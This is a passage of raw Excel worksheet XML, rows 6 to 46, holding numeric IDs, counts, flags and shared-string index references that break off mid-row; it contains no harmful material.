        <v>78</v>
      </c>
      <c r="G6">
        <v>0</v>
      </c>
      <c r="H6" t="s">
        <v>8</v>
      </c>
      <c r="I6" s="1">
        <v>43534</v>
      </c>
      <c r="J6" t="s">
        <v>66</v>
      </c>
      <c r="K6" t="s">
        <v>57</v>
      </c>
      <c r="L6" t="s">
        <v>55</v>
      </c>
      <c r="M6" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="7" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A7">
        <v>376</v>
      </c>
      <c r="B7">
        <v>360</v>
      </c>
      <c r="C7" t="s">
        <v>61</v>
      </c>
      <c r="D7" t="s">
        <v>67</v>
      </c>
      <c r="E7">
        <v>8</v>
      </c>
      <c r="F7">
        <v>290</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7" t="s">
        <v>8</v>
      </c>
      <c r="I7" s="1">
        <v>43534</v>
      </c>
      <c r="J7" t="s">
        <v>66</v>
      </c>
      <c r="K7" t="s">
        <v>57</v>
      </c>
      <c r="L7" t="s">
        <v>55</v>
      </c>
      <c r="M7" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="8" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A8">
        <v>404</v>
      </c>
      <c r="B8">
        <v>360</v>
      </c>
      <c r="C8" t="s">
        <v>68</v>
      </c>
      <c r="D8" t="s">
        <v>69</v>
      </c>
      <c r="E8">
        <v>3</v>
      </c>
      <c r="F8">
        <v>114</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8" t="s">
        <v>8</v>
      </c>
      <c r="I8" s="1">
        <v>43534</v>
      </c>
      <c r="J8" t="s">
        <v>66</v>
      </c>
      <c r="K8" t="s">
        <v>57</v>
      </c>
      <c r="L8" t="s">
        <v>55</v>
      </c>
      <c r="M8" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="9" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A9">
        <v>464</v>
      </c>
      <c r="B9">
        <v>368</v>
      </c>
      <c r="C9" t="s">
        <v>70</v>
      </c>
      <c r="D9" t="s">
        <v>71</v>
      </c>
      <c r="E9">
        <v>8</v>
      </c>
      <c r="F9">
        <v>214</v>
      </c>
      <c r="G9">
        <v>0</v>
      </c>
      <c r="H9" t="s">
        <v>8</v>
      </c>
      <c r="I9" s="1">
        <v>43534</v>
      </c>
      <c r="J9" t="s">
        <v>72</v>
      </c>
      <c r="K9" t="s">
        <v>57</v>
      </c>
      <c r="L9" t="s">
        <v>55</v>
      </c>
      <c r="M9" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="10" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A10">
        <v>472</v>
      </c>
      <c r="B10">
        <v>368</v>
      </c>
      <c r="C10" t="s">
        <v>73</v>
      </c>
      <c r="D10" t="s">
        <v>74</v>
      </c>
      <c r="E10">
        <v>8</v>
      </c>
      <c r="F10">
        <v>855</v>
      </c>
      <c r="G10">
        <v>0</v>
      </c>
      <c r="H10" t="s">
        <v>8</v>
      </c>
      <c r="I10" s="1">
        <v>43534</v>
      </c>
      <c r="J10" t="s">
        <v>72</v>
      </c>
      <c r="K10" t="s">
        <v>57</v>
      </c>
      <c r="L10" t="s">
        <v>55</v>
      </c>
      <c r="M10" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="11" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A11">
        <v>480</v>
      </c>
      <c r="B11">
        <v>368</v>
      </c>
      <c r="C11" t="s">
        <v>75</v>
      </c>
      <c r="D11" t="s">
        <v>76</v>
      </c>
      <c r="E11">
        <v>11</v>
      </c>
      <c r="F11">
        <v>218</v>
      </c>
      <c r="G11">
        <v>0</v>
      </c>
      <c r="H11" t="s">
        <v>8</v>
      </c>
      <c r="I11" s="1">
        <v>43534</v>
      </c>
      <c r="J11" t="s">
        <v>72</v>
      </c>
      <c r="K11" t="s">
        <v>57</v>
      </c>
      <c r="L11" t="s">
        <v>55</v>
      </c>
      <c r="M11" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="12" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A12">
        <v>580</v>
      </c>
      <c r="B12">
        <v>464</v>
      </c>
      <c r="C12" t="s">
        <v>77</v>
      </c>
      <c r="D12" t="s">
        <v>78</v>
      </c>
      <c r="E12">
        <v>10</v>
      </c>
      <c r="F12">
        <v>355</v>
      </c>
      <c r="G12">
        <v>0</v>
      </c>
      <c r="H12" t="s">
        <v>8</v>
      </c>
      <c r="I12" s="1">
        <v>43534</v>
      </c>
      <c r="J12" t="s">
        <v>79</v>
      </c>
      <c r="K12" t="s">
        <v>57</v>
      </c>
      <c r="L12" t="s">
        <v>55</v>
      </c>
      <c r="M12" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="13" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A13">
        <v>640</v>
      </c>
      <c r="B13">
        <v>464</v>
      </c>
      <c r="C13" t="s">
        <v>80</v>
      </c>
      <c r="D13" t="s">
        <v>81</v>
      </c>
      <c r="E13">
        <v>12</v>
      </c>
      <c r="F13">
        <v>118</v>
      </c>
      <c r="G13">
        <v>0</v>
      </c>
      <c r="H13" t="s">
        <v>8</v>
      </c>
      <c r="I13" s="1">
        <v>43534</v>
      </c>
      <c r="J13" t="s">
        <v>79</v>
      </c>
      <c r="K13" t="s">
        <v>57</v>
      </c>
      <c r="L13" t="s">
        <v>55</v>
      </c>
      <c r="M13" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="14" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A14">
        <v>692</v>
      </c>
      <c r="B14">
        <v>464</v>
      </c>
      <c r="C14" t="s">
        <v>77</v>
      </c>
      <c r="D14" t="s">
        <v>82</v>
      </c>
      <c r="E14">
        <v>7</v>
      </c>
      <c r="F14">
        <v>268</v>
      </c>
      <c r="G14">
        <v>0</v>
      </c>
      <c r="H14" t="s">
        <v>8</v>
      </c>
      <c r="I14" s="1">
        <v>43534</v>
      </c>
      <c r="J14" t="s">
        <v>79</v>
      </c>
      <c r="K14" t="s">
        <v>57</v>
      </c>
      <c r="L14" t="s">
        <v>55</v>
      </c>
      <c r="M14" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="15" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A15">
        <v>776</v>
      </c>
      <c r="B15">
        <v>464</v>
      </c>
      <c r="C15" t="s">
        <v>77</v>
      </c>
      <c r="D15" t="s">
        <v>83</v>
      </c>
      <c r="E15">
        <v>18</v>
      </c>
      <c r="F15">
        <v>510</v>
      </c>
      <c r="G15">
        <v>0</v>
      </c>
      <c r="H15" t="s">
        <v>8</v>
      </c>
      <c r="I15" s="1">
        <v>43534</v>
      </c>
      <c r="J15" t="s">
        <v>79</v>
      </c>
      <c r="K15" t="s">
        <v>57</v>
      </c>
      <c r="L15" t="s">
        <v>55</v>
      </c>
      <c r="M15" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="16" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A16">
        <v>840</v>
      </c>
      <c r="B16">
        <v>464</v>
      </c>
      <c r="C16" t="s">
        <v>77</v>
      </c>
      <c r="D16" t="s">
        <v>84</v>
      </c>
      <c r="E16">
        <v>17</v>
      </c>
      <c r="F16">
        <v>387</v>
      </c>
      <c r="G16">
        <v>0</v>
      </c>
      <c r="H16" t="s">
        <v>8</v>
      </c>
      <c r="I16" s="1">
        <v>43534</v>
      </c>
      <c r="J16" t="s">
        <v>79</v>
      </c>
      <c r="K16" t="s">
        <v>57</v>
      </c>
      <c r="L16" t="s">
        <v>55</v>
      </c>
      <c r="M16" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="17" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A17">
        <v>876</v>
      </c>
      <c r="B17">
        <v>464</v>
      </c>
      <c r="C17" t="s">
        <v>77</v>
      </c>
      <c r="D17" t="s">
        <v>85</v>
      </c>
      <c r="E17">
        <v>33</v>
      </c>
      <c r="F17">
        <v>641</v>
      </c>
      <c r="G17">
        <v>0</v>
      </c>
      <c r="H17" t="s">
        <v>8</v>
      </c>
      <c r="I17" s="1">
        <v>43534</v>
      </c>
      <c r="J17" t="s">
        <v>79</v>
      </c>
      <c r="K17" t="s">
        <v>57</v>
      </c>
      <c r="L17" t="s">
        <v>55</v>
      </c>
      <c r="M17" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="18" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A18">
        <v>912</v>
      </c>
      <c r="B18">
        <v>464</v>
      </c>
      <c r="C18" t="s">
        <v>77</v>
      </c>
      <c r="D18" t="s">
        <v>86</v>
      </c>
      <c r="E18">
        <v>33</v>
      </c>
      <c r="F18">
        <v>1092</v>
      </c>
      <c r="G18">
        <v>0</v>
      </c>
      <c r="H18" t="s">
        <v>8</v>
      </c>
      <c r="I18" s="1">
        <v>43534</v>
      </c>
      <c r="J18" t="s">
        <v>79</v>
      </c>
      <c r="K18" t="s">
        <v>57</v>
      </c>
      <c r="L18" t="s">
        <v>55</v>
      </c>
      <c r="M18" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="19" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A19">
        <v>1020</v>
      </c>
      <c r="B19">
        <v>464</v>
      </c>
      <c r="C19" t="s">
        <v>77</v>
      </c>
      <c r="D19" t="s">
        <v>87</v>
      </c>
      <c r="E19">
        <v>5</v>
      </c>
      <c r="F19">
        <v>121</v>
      </c>
      <c r="G19">
        <v>0</v>
      </c>
      <c r="H19" t="s">
        <v>8</v>
      </c>
      <c r="I19" s="1">
        <v>43534</v>
      </c>
      <c r="J19" t="s">
        <v>88</v>
      </c>
      <c r="K19" t="s">
        <v>57</v>
      </c>
      <c r="L19" t="s">
        <v>55</v>
      </c>
      <c r="M19" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="20" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A20">
        <v>1176</v>
      </c>
      <c r="B20">
        <v>464</v>
      </c>
      <c r="C20" t="s">
        <v>77</v>
      </c>
      <c r="D20" t="s">
        <v>89</v>
      </c>
      <c r="E20">
        <v>22</v>
      </c>
      <c r="F20">
        <v>604</v>
      </c>
      <c r="G20">
        <v>0</v>
      </c>
      <c r="H20" t="s">
        <v>8</v>
      </c>
      <c r="I20" s="1">
        <v>43534</v>
      </c>
      <c r="J20" t="s">
        <v>88</v>
      </c>
      <c r="K20" t="s">
        <v>57</v>
      </c>
      <c r="L20" t="s">
        <v>55</v>
      </c>
      <c r="M20" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="21" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A21">
        <v>1280</v>
      </c>
      <c r="B21">
        <v>464</v>
      </c>
      <c r="C21" t="s">
        <v>90</v>
      </c>
      <c r="D21" t="s">
        <v>91</v>
      </c>
      <c r="E21">
        <v>13</v>
      </c>
      <c r="F21">
        <v>287</v>
      </c>
      <c r="G21">
        <v>0</v>
      </c>
      <c r="H21" t="s">
        <v>8</v>
      </c>
      <c r="I21" s="1">
        <v>43534</v>
      </c>
      <c r="J21" t="s">
        <v>88</v>
      </c>
      <c r="K21" t="s">
        <v>57</v>
      </c>
      <c r="L21" t="s">
        <v>55</v>
      </c>
      <c r="M21" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="22" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A22">
        <v>1316</v>
      </c>
      <c r="B22">
        <v>464</v>
      </c>
      <c r="C22" t="s">
        <v>77</v>
      </c>
      <c r="D22" t="s">
        <v>92</v>
      </c>
      <c r="E22">
        <v>19</v>
      </c>
      <c r="F22">
        <v>312</v>
      </c>
      <c r="G22">
        <v>0</v>
      </c>
      <c r="H22" t="s">
        <v>8</v>
      </c>
      <c r="I22" s="1">
        <v>43534</v>
      </c>
      <c r="J22" t="s">
        <v>88</v>
      </c>
      <c r="K22" t="s">
        <v>57</v>
      </c>
      <c r="L22" t="s">
        <v>55</v>
      </c>
      <c r="M22" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="23" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A23">
        <v>1416</v>
      </c>
      <c r="B23">
        <v>464</v>
      </c>
      <c r="C23" t="s">
        <v>77</v>
      </c>
      <c r="D23" t="s">
        <v>93</v>
      </c>
      <c r="E23">
        <v>13</v>
      </c>
      <c r="F23">
        <v>372</v>
      </c>
      <c r="G23">
        <v>0</v>
      </c>
      <c r="H23" t="s">
        <v>8</v>
      </c>
      <c r="I23" s="1">
        <v>43534</v>
      </c>
      <c r="J23" t="s">
        <v>94</v>
      </c>
      <c r="K23" t="s">
        <v>57</v>
      </c>
      <c r="L23" t="s">
        <v>55</v>
      </c>
      <c r="M23" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="24" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A24">
        <v>1444</v>
      </c>
      <c r="B24">
        <v>464</v>
      </c>
      <c r="C24" t="s">
        <v>77</v>
      </c>
      <c r="D24" t="s">
        <v>95</v>
      </c>
      <c r="E24">
        <v>21</v>
      </c>
      <c r="F24">
        <v>355</v>
      </c>
      <c r="G24">
        <v>0</v>
      </c>
      <c r="H24" t="s">
        <v>8</v>
      </c>
      <c r="I24" s="1">
        <v>43534</v>
      </c>
      <c r="J24" t="s">
        <v>94</v>
      </c>
      <c r="K24" t="s">
        <v>57</v>
      </c>
      <c r="L24" t="s">
        <v>55</v>
      </c>
      <c r="M24" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="25" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A25">
        <v>1600</v>
      </c>
      <c r="B25">
        <v>464</v>
      </c>
      <c r="C25" t="s">
        <v>96</v>
      </c>
      <c r="D25" t="s">
        <v>97</v>
      </c>
      <c r="E25">
        <v>6</v>
      </c>
      <c r="F25">
        <v>101</v>
      </c>
      <c r="G25">
        <v>0</v>
      </c>
      <c r="H25" t="s">
        <v>8</v>
      </c>
      <c r="I25" s="1">
        <v>43534</v>
      </c>
      <c r="J25" t="s">
        <v>94</v>
      </c>
      <c r="K25" t="s">
        <v>57</v>
      </c>
      <c r="L25" t="s">
        <v>55</v>
      </c>
      <c r="M25" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="26" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A26">
        <v>1652</v>
      </c>
      <c r="B26">
        <v>464</v>
      </c>
      <c r="C26" t="s">
        <v>98</v>
      </c>
      <c r="D26" t="s">
        <v>99</v>
      </c>
      <c r="E26">
        <v>4</v>
      </c>
      <c r="F26">
        <v>46</v>
      </c>
      <c r="G26">
        <v>0</v>
      </c>
      <c r="H26" t="s">
        <v>8</v>
      </c>
      <c r="I26" s="1">
        <v>43534</v>
      </c>
      <c r="J26" t="s">
        <v>94</v>
      </c>
      <c r="K26" t="s">
        <v>57</v>
      </c>
      <c r="L26" t="s">
        <v>55</v>
      </c>
      <c r="M26" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="27" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A27">
        <v>1700</v>
      </c>
      <c r="B27">
        <v>1600</v>
      </c>
      <c r="C27" t="s">
        <v>96</v>
      </c>
      <c r="D27" t="s">
        <v>100</v>
      </c>
      <c r="E27">
        <v>0</v>
      </c>
      <c r="F27" t="s">
        <v>101</v>
      </c>
      <c r="G27">
        <v>0</v>
      </c>
      <c r="H27" t="s">
        <v>8</v>
      </c>
      <c r="I27" s="1">
        <v>43534</v>
      </c>
      <c r="J27" t="s">
        <v>94</v>
      </c>
      <c r="K27" t="s">
        <v>57</v>
      </c>
      <c r="L27" s="1">
        <v>43534</v>
      </c>
      <c r="M27" t="s">
        <v>94</v>
      </c>
      <c r="N27" t="s">
        <v>57</v>
      </c>
      <c r="O27" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="28" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A28">
        <v>1716</v>
      </c>
      <c r="B28">
        <v>332</v>
      </c>
      <c r="C28" t="s">
        <v>102</v>
      </c>
      <c r="D28" t="s">
        <v>103</v>
      </c>
      <c r="E28">
        <v>2</v>
      </c>
      <c r="F28">
        <v>33</v>
      </c>
      <c r="G28">
        <v>0</v>
      </c>
      <c r="H28" t="s">
        <v>8</v>
      </c>
      <c r="I28" s="1">
        <v>43534</v>
      </c>
      <c r="J28" t="s">
        <v>94</v>
      </c>
      <c r="K28" t="s">
        <v>57</v>
      </c>
      <c r="L28" t="s">
        <v>55</v>
      </c>
      <c r="M28" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="29" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A29">
        <v>1740</v>
      </c>
      <c r="B29">
        <v>1700</v>
      </c>
      <c r="C29" t="s">
        <v>104</v>
      </c>
      <c r="D29" t="s">
        <v>105</v>
      </c>
      <c r="E29">
        <v>4</v>
      </c>
      <c r="F29">
        <v>100</v>
      </c>
      <c r="G29">
        <v>0</v>
      </c>
      <c r="H29" t="s">
        <v>8</v>
      </c>
      <c r="I29" s="1">
        <v>43534</v>
      </c>
      <c r="J29" t="s">
        <v>94</v>
      </c>
      <c r="K29" t="s">
        <v>57</v>
      </c>
      <c r="L29" t="s">
        <v>55</v>
      </c>
      <c r="M29" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="30" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A30">
        <v>1932</v>
      </c>
      <c r="B30">
        <v>464</v>
      </c>
      <c r="C30" t="s">
        <v>106</v>
      </c>
      <c r="D30" t="s">
        <v>107</v>
      </c>
      <c r="E30">
        <v>4</v>
      </c>
      <c r="F30">
        <v>149</v>
      </c>
      <c r="G30">
        <v>0</v>
      </c>
      <c r="H30" t="s">
        <v>8</v>
      </c>
      <c r="I30" s="1">
        <v>43534</v>
      </c>
      <c r="J30" t="s">
        <v>108</v>
      </c>
      <c r="K30" t="s">
        <v>57</v>
      </c>
      <c r="L30" t="s">
        <v>55</v>
      </c>
      <c r="M30" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="31" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A31">
        <v>2044</v>
      </c>
      <c r="B31">
        <v>464</v>
      </c>
      <c r="C31" t="s">
        <v>77</v>
      </c>
      <c r="D31" t="s">
        <v>109</v>
      </c>
      <c r="E31">
        <v>5</v>
      </c>
      <c r="F31">
        <v>92</v>
      </c>
      <c r="G31">
        <v>0</v>
      </c>
      <c r="H31" t="s">
        <v>8</v>
      </c>
      <c r="I31" s="1">
        <v>43534</v>
      </c>
      <c r="J31" t="s">
        <v>110</v>
      </c>
      <c r="K31" t="s">
        <v>57</v>
      </c>
      <c r="L31" t="s">
        <v>55</v>
      </c>
      <c r="M31" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="32" spans="1:15" x14ac:dyDescent="0.25">
      <c r="A32">
        <v>2604</v>
      </c>
      <c r="B32">
        <v>464</v>
      </c>
      <c r="C32" t="s">
        <v>77</v>
      </c>
      <c r="D32" t="s">
        <v>111</v>
      </c>
      <c r="E32">
        <v>17</v>
      </c>
      <c r="F32">
        <v>390</v>
      </c>
      <c r="G32">
        <v>0</v>
      </c>
      <c r="H32" t="s">
        <v>8</v>
      </c>
      <c r="I32" s="1">
        <v>43534</v>
      </c>
      <c r="J32" t="s">
        <v>112</v>
      </c>
      <c r="K32" t="s">
        <v>57</v>
      </c>
      <c r="L32" t="s">
        <v>55</v>
      </c>
      <c r="M32" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="33" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A33">
        <v>2624</v>
      </c>
      <c r="B33">
        <v>464</v>
      </c>
      <c r="C33" t="s">
        <v>113</v>
      </c>
      <c r="D33" t="s">
        <v>114</v>
      </c>
      <c r="E33">
        <v>13</v>
      </c>
      <c r="F33">
        <v>689</v>
      </c>
      <c r="G33">
        <v>0</v>
      </c>
      <c r="H33" t="s">
        <v>8</v>
      </c>
      <c r="I33" s="1">
        <v>43534</v>
      </c>
      <c r="J33" t="s">
        <v>115</v>
      </c>
      <c r="K33" t="s">
        <v>57</v>
      </c>
      <c r="L33" t="s">
        <v>55</v>
      </c>
      <c r="M33" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="34" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A34">
        <v>324</v>
      </c>
      <c r="B34">
        <v>464</v>
      </c>
      <c r="C34" t="s">
        <v>116</v>
      </c>
      <c r="D34" t="s">
        <v>117</v>
      </c>
      <c r="E34">
        <v>9</v>
      </c>
      <c r="F34">
        <v>273</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34" t="s">
        <v>8</v>
      </c>
      <c r="I34" s="1">
        <v>43534</v>
      </c>
      <c r="J34" t="s">
        <v>118</v>
      </c>
      <c r="K34" t="s">
        <v>57</v>
      </c>
      <c r="L34" t="s">
        <v>55</v>
      </c>
      <c r="M34" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="35" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A35">
        <v>3300</v>
      </c>
      <c r="B35">
        <v>840</v>
      </c>
      <c r="C35" t="s">
        <v>119</v>
      </c>
      <c r="D35" t="s">
        <v>120</v>
      </c>
      <c r="E35">
        <v>3</v>
      </c>
      <c r="F35">
        <v>72</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35" t="s">
        <v>8</v>
      </c>
      <c r="I35" s="1">
        <v>43534</v>
      </c>
      <c r="J35" t="s">
        <v>118</v>
      </c>
      <c r="K35" t="s">
        <v>57</v>
      </c>
      <c r="L35" t="s">
        <v>55</v>
      </c>
      <c r="M35" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="36" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A36">
        <v>3484</v>
      </c>
      <c r="B36">
        <v>3692</v>
      </c>
      <c r="C36" t="s">
        <v>121</v>
      </c>
      <c r="D36" t="s">
        <v>122</v>
      </c>
      <c r="E36">
        <v>31</v>
      </c>
      <c r="F36">
        <v>946</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36" t="s">
        <v>8</v>
      </c>
      <c r="I36" s="1">
        <v>43534</v>
      </c>
      <c r="J36" t="s">
        <v>118</v>
      </c>
      <c r="K36" t="s">
        <v>57</v>
      </c>
      <c r="L36" t="s">
        <v>55</v>
      </c>
      <c r="M36" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="37" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A37">
        <v>3008</v>
      </c>
      <c r="B37">
        <v>3692</v>
      </c>
      <c r="C37" t="s">
        <v>123</v>
      </c>
      <c r="D37" t="s">
        <v>124</v>
      </c>
      <c r="E37">
        <v>1</v>
      </c>
      <c r="F37">
        <v>25</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37" t="s">
        <v>8</v>
      </c>
      <c r="I37" s="1">
        <v>43534</v>
      </c>
      <c r="J37" t="s">
        <v>118</v>
      </c>
      <c r="K37" t="s">
        <v>57</v>
      </c>
      <c r="L37" t="s">
        <v>55</v>
      </c>
      <c r="M37" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="38" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A38">
        <v>1540</v>
      </c>
      <c r="B38">
        <v>376</v>
      </c>
      <c r="C38" t="s">
        <v>102</v>
      </c>
      <c r="D38" t="s">
        <v>125</v>
      </c>
      <c r="E38">
        <v>2</v>
      </c>
      <c r="F38">
        <v>50</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38" t="s">
        <v>8</v>
      </c>
      <c r="I38" s="1">
        <v>43534</v>
      </c>
      <c r="J38" t="s">
        <v>118</v>
      </c>
      <c r="K38" t="s">
        <v>57</v>
      </c>
      <c r="L38" t="s">
        <v>55</v>
      </c>
      <c r="M38" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="39" spans="1:14" s="3" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A39" s="3">
        <v>3672</v>
      </c>
      <c r="B39" s="3">
        <v>3008</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>126</v>
      </c>
      <c r="D39" s="3" t="s">
        <v>127</v>
      </c>
      <c r="E39" s="3">
        <v>12</v>
      </c>
      <c r="F39" s="3">
        <v>382</v>
      </c>
      <c r="G39" s="3">
        <v>1</v>
      </c>
      <c r="H39" s="3" t="s">
        <v>8</v>
      </c>
      <c r="I39" s="4">
        <v>43534</v>
      </c>
      <c r="J39" s="3" t="s">
        <v>118</v>
      </c>
      <c r="K39" s="3" t="s">
        <v>57</v>
      </c>
      <c r="L39" s="3" t="s">
        <v>55</v>
      </c>
      <c r="M39" s="3" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="40" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A40">
        <v>2700</v>
      </c>
      <c r="B40">
        <v>3484</v>
      </c>
      <c r="C40" t="s">
        <v>128</v>
      </c>
      <c r="D40" t="s">
        <v>129</v>
      </c>
      <c r="E40">
        <v>13</v>
      </c>
      <c r="F40">
        <v>142</v>
      </c>
      <c r="G40">
        <v>1</v>
      </c>
      <c r="H40" t="s">
        <v>8</v>
      </c>
      <c r="I40" s="1">
        <v>43534</v>
      </c>
      <c r="J40" t="s">
        <v>130</v>
      </c>
      <c r="K40" t="s">
        <v>57</v>
      </c>
      <c r="L40" t="s">
        <v>55</v>
      </c>
      <c r="M40" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="41" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A41">
        <v>992</v>
      </c>
      <c r="B41">
        <v>3484</v>
      </c>
      <c r="C41" t="s">
        <v>131</v>
      </c>
      <c r="D41" t="s">
        <v>132</v>
      </c>
      <c r="E41">
        <v>10</v>
      </c>
      <c r="F41">
        <v>461</v>
      </c>
      <c r="G41">
        <v>1</v>
      </c>
      <c r="H41" t="s">
        <v>8</v>
      </c>
      <c r="I41" s="1">
        <v>43534</v>
      </c>
      <c r="J41" t="s">
        <v>130</v>
      </c>
      <c r="K41" t="s">
        <v>57</v>
      </c>
      <c r="L41" t="s">
        <v>55</v>
      </c>
      <c r="M41" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="42" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A42">
        <v>1776</v>
      </c>
      <c r="B42">
        <v>992</v>
      </c>
      <c r="C42" t="s">
        <v>131</v>
      </c>
      <c r="D42" t="s">
        <v>133</v>
      </c>
      <c r="E42">
        <v>29</v>
      </c>
      <c r="F42">
        <v>706</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42" t="s">
        <v>8</v>
      </c>
      <c r="I42" s="1">
        <v>43534</v>
      </c>
      <c r="J42" t="s">
        <v>130</v>
      </c>
      <c r="K42" t="s">
        <v>57</v>
      </c>
      <c r="L42" t="s">
        <v>55</v>
      </c>
      <c r="M42" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="43" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A43">
        <v>1988</v>
      </c>
      <c r="B43">
        <v>776</v>
      </c>
      <c r="C43" t="s">
        <v>134</v>
      </c>
      <c r="D43" t="s">
        <v>135</v>
      </c>
      <c r="E43">
        <v>5</v>
      </c>
      <c r="F43">
        <v>161</v>
      </c>
      <c r="G43">
        <v>0</v>
      </c>
      <c r="H43" t="s">
        <v>8</v>
      </c>
      <c r="I43" s="1">
        <v>43534</v>
      </c>
      <c r="J43" t="s">
        <v>130</v>
      </c>
      <c r="K43" t="s">
        <v>57</v>
      </c>
      <c r="L43" t="s">
        <v>55</v>
      </c>
      <c r="M43" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="44" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A44">
        <v>2480</v>
      </c>
      <c r="B44">
        <v>580</v>
      </c>
      <c r="C44" t="s">
        <v>136</v>
      </c>
      <c r="D44" t="s">
        <v>137</v>
      </c>
      <c r="E44">
        <v>11</v>
      </c>
      <c r="F44">
        <v>236</v>
      </c>
      <c r="G44">
        <v>0</v>
      </c>
      <c r="H44" t="s">
        <v>8</v>
      </c>
      <c r="I44" s="1">
        <v>43534</v>
      </c>
      <c r="J44" t="s">
        <v>138</v>
      </c>
      <c r="K44" t="s">
        <v>57</v>
      </c>
      <c r="L44" t="s">
        <v>55</v>
      </c>
      <c r="M44" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="45" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A45">
        <v>3292</v>
      </c>
      <c r="B45">
        <v>580</v>
      </c>
      <c r="C45" t="s">
        <v>136</v>
      </c>
      <c r="D45" t="s">
        <v>139</v>
      </c>
      <c r="E45">
        <v>7</v>
      </c>
      <c r="F45">
        <v>195</v>
      </c>
      <c r="G45">
        <v>0</v>
      </c>
      <c r="H45" t="s">
        <v>8</v>
      </c>
      <c r="I45" s="1">
        <v>43534</v>
      </c>
      <c r="J45" t="s">
        <v>140</v>
      </c>
      <c r="K45" t="s">
        <v>57</v>
      </c>
      <c r="L45" t="s">
        <v>55</v>
      </c>
      <c r="M45" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="46" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A46">
        <v>2412</v>
      </c>
      <c r="B46">
        <v>912</v>
      </c>
      <c r="C46" t="s">
        <v>141</v>
      </c>
      <c r="D46" t="s">
        <v>142</v>
      </c>
      <c r="E46">
        <v>3</v>
      </c>
      <c r="F46">
        <v>87</v>
      </c>
      <c r="G46">
        <v>1</v>
      </c>
      <c r="H46" t="s">
        <v>8</v>
      </c>
      <c r="I46" s="1">
        <v>43534</v>
      </c>
      <c r="J46" t="s">
        <v>143</v>
      </c>
      <c r="K46" t="s">
        <v>57</v>
      </c>
      <c r="L46" t="s">
        <v>55</v>
